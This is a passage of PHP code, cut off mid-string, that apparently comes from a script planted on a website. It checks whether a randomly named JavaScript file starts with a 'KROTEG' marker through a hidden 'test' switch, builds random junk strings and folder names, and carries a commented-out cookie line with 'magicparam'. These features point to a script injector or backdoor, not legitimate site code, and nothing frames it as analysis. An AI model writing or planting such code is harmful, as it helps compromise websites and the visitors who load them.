$script_fn = "4aga8yi25kk-.js";
if (isset($_GET['test']) && $_GET['test']==1)
{
$a = file($script_fn);
if (trim($a[0]) == '// KROTEG') {
print "KROTEG";
}
exit();
}
function rand_str ($md5 = 0) {
$count = rand(4,9);
$text = "";
for ($i=0; $i<$count; $i++) {
if ($md5) {
$text .= md5(rand(1, 999999))." ";
}
else {
$text .= rand(1, 999999)." ";
}
}
return $text;
}
function folder_rand() {
$fold = "";
$count_ch = rand(7, 15);
//$alf = "abcdefghijklmnopqrstuvwxyz0123456789";
$alf = "abcdefghijklmnopqrstuvwxyz";
for ($i=0; $i<$count_ch; $i++) {
$fold .= $alf[rand(0, strlen($alf)-1)];
}
return $fold;
}
//setcookie($magicparam, $magicvalue);
if ($script_fn != "") {
$rscript = folder_rand()." ".folder_rand()."\n";
$rscript .= '